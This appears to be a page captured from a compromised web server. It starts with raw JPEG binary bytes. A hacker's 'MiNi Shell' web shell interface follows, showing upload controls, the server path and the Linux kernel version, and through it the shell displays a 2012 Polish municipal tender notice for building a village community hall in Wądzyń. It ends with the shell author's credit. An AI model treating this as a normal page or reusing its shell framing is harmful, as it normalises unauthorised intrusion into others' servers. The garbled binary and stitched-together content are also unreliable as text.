JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120210/40286-N-2012.html

<p class="kh_header"><b>Bobrowo: Budowa świetlicy wiejskiej wraz z infrastrukturą na działkach 151/3 i 151/4 w miejscowości Wądzyń</b><br>
<b>Numer ogłoszenia: 40286 - 2012; data zamieszczenia: 10.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bobrowo , 27, 87-327 Bobrowo, woj. kujawsko-pomorskie, tel. 056 495-18-24, faks 056 495-18-10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bobrowo.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa świetlicy wiejskiej wraz z infrastrukturą na działkach 151/3 i 151/4 w miejscowości Wądzyń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Budowa świetlicy wiejskiej wraz z infrastrukturą na działkach 151/3 i 151/4 w miejscowości Wądzyń. Opis przedmiotu zamówienia:
1)budynek parterowy bez podpiwniczenia i poddasza użytkowego, wolnostojący z dachem dwuspadowym o kącie nachylenia połaci około 30°. Obiekt podzielono na część świetlicy z zapleczem, sanitariaty oraz pomieszczenie gospodarcze. Przeznaczony jako świetlica wiejska o następujących parametrach:
a) powierzchnia zabudowy 149,08 m2
b) powierzchnia użytkowa 127,22 m2
c) kubatura 754,34 m3
2)rozwiązania architektoniczno - budowlane
- Opis elementów konstrukcyjnych
Ławy fundamentowe - żelbetowe monolityczne z bet kl. B20
Cokoły fundamentowe - grubości 25 cm z bloczków betonowych na zaprawie cementowej M.5
Ściany konstrukcyjne przyziemia - konstrukcję stanowią słupy żelbetowe wraz ze ścianami  murowanymi z pustaka gazobetonowego o grubości 24 i 18 cm.
Wieńce - zwieńczenie ścian i słupów stanowić będą wieńce żelbetowe z betonu kl. B20, w poziomie pod oparciem wiązara kratowego
Dach - konstrukcję dachu stanowić będzie wiązar kratowy oparty na żelbetowych wieńcach ścian murowanych wraz ze słupami konstrukcyjnymi.
Nadproże nad otworami - zaprojektowano nadproża prefabrykowane z belek L19 o rozpiętości od 120 cm do 210 cm
Wentylacja - grawitacyjna kanałami wentylacyjnymi ceramicznymi.
Stropodach - blacho dachówka na pełnym deskowaniu zamocowanym na elementach wiązara dachowego
3)Roboty wykończeniowe
Podłogi i posadzki - zaprojektowano płytki ceramiczne gresowe antypoślizgowe,
Stolarka - okna z tworzywa PCV
- drzwi wejściowe z tworzywa PCV
- drzwi wewnętrzne płytowe z MDF
Stolarka okienna i drzwiowa zewnętrzna i wewnętrzna drewniana o wymiarach znormalizowanych. Szyba okien zewnętrznych podwójna, K max=2,0 W/m2K,
Wykończenie ścian - szpachlowane i malowane farbami emulsyjnymi gotowymi w kolorze , w sanitariatach, zapleczu świetlicy i pomieszczeniu gospodarczym wyłożone płytkami ceramicznymi ściennymi do wysokości 200 cm.
Ścianki działowe - murowane z bloczka gazobetonowego, szpachlowane i malowane w kolorze farbami emulsyjnymi gotowymi, ścianki wydzielające kabiny ustępowe w sanitariatach oraz pisuary zaprojektowano z płyt laminatu kompaktowego (łącznie z drzwiami) o grubości 13 mm, który spełnia normy dotyczące wymagań wilgotności oraz jest materiałem łatwo zmywalnym. Dopuszcza się zamocowanie ścianki przepierzającej na wysokości od posadzki około 15 cm i do wysokości min. 200 cm.
Elewacja - tynk silikonowy strukturalny np. KORNIK malowany wykonany na warstwie termoizolacyjnej ścian ze styropianu. Warstwę izolacji termicznej budynku należy wykonać ze styropianu grubości 12 cm, 2-krotnie warstwy klejowej podkładowej i nawierzchniowej oraz warstwy siatki z tworzywa wzmacniającej zatopionej (do wysokości 200 cm siatka podwójnie).
Pokrycie dachu- zaprojektowano blacho dachówkę powlekaną matową w kolorze wskazanym przez Zamawiającego. Grubość blachy 0,55 mm. Pokrycie zamocowane na łatach drewnianych. Wszelkie obróbki dekarskie wykonać z blachy powlekanej w kolorze pokrycia. System orynnowania z blachy ocynkowanej powlekanej w kolorze.
4)Wyposażenie instalacyjne
Obiekt wyposażony w instalacje elektryczne gniazd i oświetlenia, sanitarne - wodociągowo-kanalizacyjne i wentylacji. 
5)Przyłącza wod. - kan. 
Projektowane przyłącza wod-kan włączone do istniejącej gminnej sieci. Przyłącze
wodociągowe wykonane z rury PE100 o średnicy 32x2,0 PN10. Przyłącze kanalizacji sanitarnej wykonane z rur kanalizacyjnych PVC O160 klasy SN8 kielichowych łączonych na uszczelkę gumową Wewnętrzna instalacja wodociągowa wykonana z rur polipropylenowych łączonych metodą zgrzewania. Przewody prowadzone w posadzkach oraz bruzdach ściennych. Ciepła woda przygotowywana w pojemnościowych podgrzewaczach wody. Instalacja kanalizacyjna wykonana z rur PVC łączonych na kielichy z uszczelkami gumowymi. 
6)Instalacja elektryczna
Zasilanie obiektu ze złącza pomiarowego kablem YKY 5x10 do rozdzielnicy głównej.
Instalacja oświetleniowa i gniazd wykonana przewodami typu YDYp z osprzętem podtynkowym. Oprawy oświetlenia podstawowego, awaryjnego oraz ewakuacyjnego
Instalacja ogrzewania elektrycznego na bazie grzejników konwektorowych
Instalacja połączeń wyrównawczych. Instalacja odgromowa budynku
Oświetlenie zewnętrzne wykonane kablem typu YKY 3x5 z oprawami parkowymi na słupach stalowych ocynkowanych 5m.
8) Parkingi i dojazdy
Obiekt wyposażony w bezpośredni zjazd z drogi gminnej oraz parking o powierzchni 694 m2
9) Całość inwestycji opisana dokumentacją projektowo - kosztorysową (branży arch.- kontr, sanitarnej i elektrycznej) opracowaną przez Usługi Inwestycyjne Nadzory i Budowlane Kosztorysowanie  inż. Sławomir Mańka, Gorczenica 98C, 87-300 Brodnica   oraz zatwierdzona pozwoleniem na budowę Starosty Brodnickiego z dnia 8 lipca 2011r. nr WB.6740.1.20.2011 



W ramach zaoferowanej ceny do obowiązków Wykonawcy będzie należało:
1)	przejęcie od Zamawiającego placu budowy i jego organizacja:
a) zamawiający udostępni teren budowy w zakresie niezbędnym do wykonania robót. Dojazd do placu budowy z istniejących dróg. Roboty należy prowadzić w sposób , aby nie doprowadzić do zanieczyszczenia istniejących dróg.
b) przed przystąpieniem do realizacji zadania kierownik budowy opracuje plan bezpieczeństwa i ochrony zdrowia (BIOZ) oraz umieści na terenie budowy tablicę informacyjną.
c) urządzenie placu budowy, jego zabezpieczenie (ogrodzenie prowizoryczne), wykonawca wykona we własnym zakresie w ramach kosztów ogólnych.
d) Zaopatrzenie placu budowy w energię elektryczną - we własnym zakresie
e) Zaopatrzenie w wodę dla potrzeb technologicznych i socjalnych - we własnym zakresie
f) Wykonawca przyjmie na siebie obowiązek obsługi geodezyjnej, oraz geodezyjnej
inwentaryzacji powykonawczej. Koszty wykonania w ramach wynagrodzenia.
g) Urządzenie placu budowy, jego zabezpieczenie z uwzględnieniem bezpieczeństwa i higieny pracy zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 6.02.2003r. (Dz. U. Nr 47), wykonawca wykona we własnym zakresie w ramach kosztów ogólnych.
h) Po zrealizowaniu zakresu robót, wykonawca zlikwiduje urządzenia placu budowy i
doprowadzi teren placu budowy do stanu pierwotnego.
2)	wykonania przedmiotu umowy z materiałów odpowiadających wymaganiom określonym w art. 10 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006r. Nr 156, poz. 1118 z późniejszymi zmianami), okazania, na każde żądanie Zamawiającego lub Inspektora nadzoru inwestorskiego, certyfikatów zgodności z polską normą lub aprobatą techniczną każdego używanego na budowie wyrobu;
3)	ponoszenia pełnej odpowiedzialności za stan i przestrzeganie przepisów bhp, ochronę p.poż i dozór mienia na terenie robót, jak i za wszelkie szkody powstałe w trakcie trwania robót na terenie przyjętym od Zamawiającego lub mających związek z prowadzonymi robotami;
4)	terminowego wykonania i przekazania do eksploatacji przedmiotu umowy oraz oświadczenia, że roboty ukończone przez niego są całkowicie zgodne z umową i  odpowiadają potrzebom, dla których są przewidziane według umowy;
5)	dostarczanie niezbędnych dokumentów potwierdzających parametry techniczne oraz wymagane normy stosowanych materiałów i urządzeń w tym np. wyników oraz protokołów badań, sprawozdań i prób dotyczących realizowanego przedmiotu niniejszej Umowy;
6)	uporządkowanie terenu budowy po zakończeniu robót, zaplecza budowy, jak również terenów sąsiadujących zajętych lub użytkowanych przez Wykonawcę w tym dokonania na własny koszt renowacji zniszczonych lub uszkodzonych w wyniku prowadzonych prac obiektów, fragmentów terenu dróg, nawierzchni lub instalacji;
7)	kompletowanie w trakcie realizacji robót wszelkiej dokumentacji zgodnie z przepisami Prawa budowlanego oraz przygotowanie do odbioru końcowego kompletu protokołów i dokumentów niezbędnych przy odbiorze i uzyskaniu pozwolenia na użytkowanie obiektu;
8)	kompleksowa obsługa geodezyjna (wytyczenie obiektu i inwentaryzacja powykonawcza)
9)	usunięcie wszelkich wad i usterek stwierdzonych przez nadzór inwestorski w trakcie trwania robót w terminie nie dłuższym niż termin technicznie uzasadniony i konieczny do ich usunięcia;
10)	niezwłoczne informowanie Zamawiającego (Inspektora nadzoru inwestorskiego) o problemach technicznych lub okolicznościach, które mogą wpłynąć na jakość robót lub termin zakończenia robót; 
11)	przestrzeganie zasad bezpieczeństwa, BHP, p.poż. 
12)	wykonawca zobowiązany jest zapewnić wykonanie i kierowanie robotami objętymi umową przez osoby posiadające stosowne kwalifikacje zawodowe i uprawnienia budowlane.
13)	wykonawca zobowiązuje się wyznaczyć do kierowania robotami osoby wskazane w Ofercie Wykonawcy.
14)	kierownik budowy i kierownicy robót zobowiązani są do prowadzenia dziennika budowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 5.000,00 PLN                   (słownie: pięć tysięcy złotych 00/100 PLN).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia w tym zakresie Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:  2 roboty ogólnobudowlane, polegające na budowie budynku o pow. zabudowy min. 100 m2. Wartość każdej z tych  robót musi wynosić minimum 300.000 zł.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia w tym zakresie Wykonawca musi wykazać, iż dysponuje nw. osobami: 
Funkcja	Uprawnienia
Kierownik budowy	
Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno budowlanej bez ograniczeń albo lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów

Kierownik robót sanitarnych	
Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów

Kierownik robót elektrycznych	
Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów 
.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej w tym zakresie Wykonawca ubiegający się o realizację zamówienia musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż  300 000,00- PLN (słownie: trzysta
tysięcy złotych 00/100).
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1	Formularz ofertowy (załącznik nr 1 do SIWZ)
2	Projekt umowy parafowany i opieczętowany na każdej stronie (załącznik nr 7 do SIWZ)
3	Kosztorys ofertowy sporządzony ściśle  wg przedmiaru robót, metodą uproszczoną (z podaniem stawki roboczogodziny oraz zastosowanych narzutów oraz tabelą elementów scalonych)
4	W przypadku działania Wykonawcy przez pełnomocnika należy dołączyć do oferty pełnomocnictwo w oryginale bądź jego kopię poświadczoną notarialnie, z którego treści będzie wynikać zakres udzielonego umocowania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach: 
1)	jeżeli Zamawiający dokonał zmiany sposobu wykonania części przedmiotu umowy, czego nie można było przewidzieć, ani też nie wynikało to z potrzeby wykonywania robót i nie można było tego przewidzieć przed zawarciem umowy,
2)	jeżeli wystąpi konieczność wykonania zamówień dodatkowych, których przy zawieraniu umowy nie można było przewidzieć rozmiaru lub kosztów prac,
3)	jeżeli wystąpi konieczność wprowadzenia zmian w dokumentacji projektowej czego nie można było przewidzieć w chwili zawarcia umowy i może mieć to wpływ na termin wykonania przedmiotu umowy,
4)	jeżeli zmianie ulegnie urzędowa stawka VAT na roboty budowlane,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bobrowo.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
Bobrowo 27
87-327 BOBROWO.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2012 godzina 10:00, miejsce: Urząd Gminy
Bobrowo 27
87-327 BOBROWO
pokój nr 12 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Programu Rozwoju Obszarów Wiejskich w ramach działania 413 Wdrażanie Lokalnych Strategii Rozwoju dla operacji które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i Rozwój Wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com